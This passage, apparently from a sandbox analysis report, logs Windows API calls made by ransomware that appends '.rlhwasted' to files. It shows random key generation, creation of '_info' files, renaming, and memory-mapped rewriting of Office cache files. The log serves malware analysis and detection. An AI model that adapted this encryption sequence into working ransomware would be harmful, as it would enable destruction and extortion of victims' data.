CloseHandle (hObject=0x114) returned 1 [0183.607] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7d0 | out: hHeap=0x6b0000) returned 1 [0183.607] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e9120 | out: hHeap=0x6b0000) returned 1 [0183.607] ResetEvent (hEvent=0xf8) returned 1 [0183.607] _aulldvrm () returned 0x0 [0183.607] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6d5ae8) returned 1 [0183.608] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.608] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.608] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0183.608] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6ec7d0 [0183.608] lstrcpyW (in: lpString1=0x6ec868, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.608] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eca80 [0183.608] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6d5ae8) returned 1 [0183.609] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0xa34, pbBuffer=0x6eca80 | out: pbBuffer=0x6eca80) returned 1 [0183.609] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.609] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0183.610] WriteFile (in: hFile=0x114, lpBuffer=0x6eca80*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eca80*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.611] SetEndOfFile (hFile=0x114) returned 1 [0183.611] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.611] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eca80 | out: hHeap=0x6b0000) returned 1 [0183.611] lstrcpyW (in: lpString1=0x6ec868, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0183.612] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0183.612] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0183.613] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x8f8 [0183.613] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f8) returned 0x6a0000 [0183.613] CloseHandle (hObject=0x128) returned 1 [0183.615] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0183.616] CloseHandle (hObject=0x124) returned 1 [0183.616] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6eb570 [0183.616] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6e93e8) returned 1 [0183.617] CryptGenRandom (in: hProv=0x6e93e8, dwLen=0x1b8, pbBuffer=0x6eb5b8 | out: pbBuffer=0x6eb5b8) returned 1 [0183.617] CryptReleaseContext (hProv=0x6e93e8, dwFlags=0x0) returned 1 [0183.617] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6e93e8) returned 1 [0183.617] CryptGenRandom (in: hProv=0x6e93e8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.617] CryptReleaseContext (hProv=0x6e93e8, dwFlags=0x0) returned 1 [0183.630] SetEndOfFile (hFile=0x114) returned 1 [0183.632] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eca80 | out: hHeap=0x6b0000) returned 1 [0183.632] CloseHandle (hObject=0x114) returned 1 [0183.636] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7d0 | out: hHeap=0x6b0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0183.637] WaitForMultipleObjects (nCount=0x2, lpHandles=0x12aff80*=0xf8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0183.640] ResetEvent (hEvent=0xf8) returned 1 [0183.640] _aulldvrm () returned 0x0 [0183.640] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6d5ae8) returned 1 [0183.641] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.641] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.641] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0183.641] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b2) returned 0x6ec9d8 [0183.641] lstrcpyW (in: lpString1=0x6eca80, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.641] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ecc98 [0183.642] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6d5ae8) returned 1 [0183.642] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0xa34, pbBuffer=0x6ecc98 | out: pbBuffer=0x6ecc98) returned 1 [0183.643] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.643] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0183.643] WriteFile (in: hFile=0x124, lpBuffer=0x6ecc98*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ecc98*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.644] SetEndOfFile (hFile=0x124) returned 1 [0183.645] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.645] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecc98 | out: hHeap=0x6b0000) returned 1 [0183.645] lstrcpyW (in: lpString1=0x6eca80, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.rlhwasted")) returned 1 [0183.646] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0183.646] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0183.646] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x5aa [0183.646] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0x6a0000 [0183.646] CloseHandle (hObject=0x128) returned 1 [0183.649] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0183.649] CloseHandle (hObject=0x110) returned 1 [0183.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0183.650] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6d5aa8) returned 1 [0183.651] CryptGenRandom (in: hProv=0x6d5aa8, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0183.651] CryptReleaseContext (hProv=0x6d5aa8, dwFlags=0x0) returned 1 [0183.651] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6d5aa8) returned 1 [0183.652] CryptGenRandom (in: hProv=0x6d5aa8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.652] CryptReleaseContext (hProv=0x6d5aa8, dwFlags=0x0) returned 1 [0183.664] SetEndOfFile (hFile=0x124) returned 1 [0183.668] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed0a8 | out: hHeap=0x6b0000) returned 1 [0183.668] CloseHandle (hObject=0x124) returned 1 [0183.672] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec9d8 | out: hHeap=0x6b0000) returned 1 [0183.672] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e9120 | out: hHeap=0x6b0000) returned 1 [0183.673] ResetEvent (hEvent=0xf8) returned 1 [0183.673] _aulldvrm () returned 0x0 [0183.673] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6e91c0) returned 1 [0183.674] CryptGenRandom (in: hProv=0x6e91c0, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.674] CryptReleaseContext (hProv=0x6e91c0, dwFlags=0x0) returned 1 [0183.674] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0183.674] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6ecef0 [0183.674] lstrcpyW (in: lpString1=0x6ecf88, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.674] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ed1a0 [0183.674] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6e91c0) returned 1 [0183.675] CryptGenRandom (in: hProv=0x6e91c0, dwLen=0xa34, pbBuffer=0x6ed1a0 | out: pbBuffer=0x6ed1a0) returned 1 [0183.675] CryptReleaseContext (hProv=0x6e91c0, dwFlags=0x0) returned 1 [0183.675] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0183.676] WriteFile (in: hFile=0x124, lpBuffer=0x6ed1a0*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ed1a0*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.677] SetEndOfFile (hFile=0x124) returned 1 [0183.677] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.677] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed1a0 | out: hHeap=0x6b0000) returned 1 [0183.677] lstrcpyW (in: lpString1=0x6ecf88, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0183.678] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0183.678] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0183.678] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x75e [0183.678] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x75e) returned 0x6a0000 [0183.678] CloseHandle (hObject=0x110) returned 1 [0183.682] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0183.682] CloseHandle (hObject=0x128) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0183.682] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6e91c0) returned 1 [0183.683] CryptGenRandom (in: hProv=0x6e91c0, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0183.683] CryptReleaseContext (hProv=0x6e91c0, dwFlags=0x0) returned 1 [0183.683] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6e91c0) returned 1 [0183.684] CryptGenRandom (in: hProv=0x6e91c0, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.684] CryptReleaseContext (hProv=0x6e91c0, dwFlags=0x0) returned 1 [0183.696] SetEndOfFile (hFile=0x124) returned 1 [0183.699] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb668 | out: hHeap=0x6b0000) returned 1 [0183.699] CloseHandle (hObject=0x124) returned 1 [0183.701] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecef0 | out: hHeap=0x6b0000) returned 1 [0183.701] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0183.701] WaitForMultipleObjects (nCount=0x2, lpHandles=0x12aff80*=0xf8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0183.704] ResetEvent (hEvent=0xf8) returned 1 [0183.704] _aulldvrm () returned 0x0 [0183.704] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6d5ae8) returned 1 [0183.705] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.705] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.705] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0183.705] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b0) returned 0x6eb570 [0183.705] lstrcpyW (in: lpString1=0x6eb616, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.705] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eb828 [0183.705] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6d5ae8) returned 1 [0183.706] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0xa34, pbBuffer=0x6eb828 | out: pbBuffer=0x6eb828) returned 1 [0183.706] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.706] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0183.707] WriteFile (in: hFile=0x128, lpBuffer=0x6eb828*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eb828*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.708] SetEndOfFile (hFile=0x128) returned 1 [0183.708] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.708] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.708] lstrcpyW (in: lpString1=0x6eb616, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.rlhwasted")) returned 1 [0183.732] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0183.736] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0183.741] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x5aa [0183.741] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5aa) returned 0x6a0000 [0183.741] CloseHandle (hObject=0x110) returned 1 [0183.749] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0183.749] CloseHandle (hObject=0x114) returned 1 [0183.749] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6eba80 [0183.749] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6ebc88) returned 1 [0183.750] CryptGenRandom (in: hProv=0x6ebc88, dwLen=0x1b8, pbBuffer=0x6ebac8 | out: pbBuffer=0x6ebac8) returned 1 [0183.750] CryptReleaseContext (hProv=0x6ebc88, dwFlags=0x0) returned 1 [0183.751] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6ebc88) returned 1 [0183.751] CryptGenRandom (in: hProv=0x6ebc88, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.751] CryptReleaseContext (hProv=0x6ebc88, dwFlags=0x0) returned 1 [0183.764] SetEndOfFile (hFile=0x128) returned 1 [0183.766] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec098 | out: hHeap=0x6b0000) returned 1 [0183.766] CloseHandle (hObject=0x128) returned 1 [0183.770] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0183.771] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e9120 | out: hHeap=0x6b0000) returned 1 [0183.771] _aulldvrm () returned 0x0 [0183.771] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6e9120) returned 1 [0183.772] CryptGenRandom (in: hProv=0x6e9120, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.772] CryptReleaseContext (hProv=0x6e9120, dwFlags=0x0) returned 1 [0183.772] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0183.772] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb570 [0183.772] lstrcpyW (in: lpString1=0x6eb608, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.772] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eba80 [0183.772] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6e9120) returned 1 [0183.773] CryptGenRandom (in: hProv=0x6e9120, dwLen=0xa34, pbBuffer=0x6eba80 | out: pbBuffer=0x6eba80) returned 1 [0183.773] CryptReleaseContext (hProv=0x6e9120, dwFlags=0x0) returned 1 [0183.773] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0183.774] WriteFile (in: hFile=0x128, lpBuffer=0x6eba80*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eba80*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.775] SetEndOfFile (hFile=0x128) returned 1 [0183.775] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.775] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eba80 | out: hHeap=0x6b0000) returned 1 [0183.775] lstrcpyW (in: lpString1=0x6eb608, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0183.776] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0183.776] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0183.776] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x648 [0183.776] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x648) returned 0x6a0000 [0183.777] CloseHandle (hObject=0x114) returned 1 [0183.784] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0183.784] CloseHandle (hObject=0x110) returned 1 [0183.785] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6eba80 [0183.785] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6ebc88) returned 1 [0183.786] CryptGenRandom (in: hProv=0x6ebc88, dwLen=0x1b8, pbBuffer=0x6ebac8 | out: pbBuffer=0x6ebac8) returned 1 [0183.786] CryptReleaseContext 